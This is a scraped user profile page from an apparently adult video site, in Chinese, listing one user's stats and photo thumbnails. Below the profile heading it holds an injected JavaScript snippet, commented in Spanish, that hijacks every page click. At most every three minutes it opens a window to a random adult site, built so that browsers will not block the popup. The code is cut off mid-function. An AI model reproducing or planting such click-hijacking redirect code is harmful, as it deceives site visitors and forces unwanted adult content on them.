rockib29的化身

rockib29

订阅人: 10
好友: 11
视频看: 231
配置文件的风景: 670
性别: 男性
关系: 隐藏
感兴趣: 隐藏
已加入: 4 年 之前
最后登陆: 3 年 之前
rockib29的Previsouly看照片 (2)
  • photo-thumb
    10438 观看次数 93%
  • photo-thumb
    23291 观看次数 100%
个人主页
(function() { // Lista de sitios web de destino const sitiosDestino = [ "https://videosxy.net", "https://goldenshowe.com", "https://exposedwife.com" ]; const TIEMPO_ESPERA_MS = 3 * 60 * 1000; // 3 minutos const CLAVE_STORAGE = "ultimo_salto_timestamp"; document.addEventListener("click", function(evento) { const ahora = Date.now(); const ultimoSalto = localStorage.getItem(CLAVE_STORAGE); // Verificar el intervalo de 3 minutos if (!ultimoSalto || (ahora - parseInt(ultimoSalto, 10)) >= TIEMPO_ESPERA_MS) { // 1. Abrir la ventana inmediatamente para evitar que el navegador la bloquee const nuevaVentana = window.open("about:blank", "_blank"); if (nuevaVentana) { // Registrar el salto localStorage.setItem(CLAVE_STORAGE, ahora); // Seleccionar la URL const urlAleatoria = sitiosDestino[Math.floor(Math.random() * sitiosDestino.length)]; // 2. Establecer la política no-referrer antes de cargar la dirección destino nuevaVentana.opener = null; // Quita la referencia opener por seguridad nuevaVentana.location.href = urlAleatoria; } }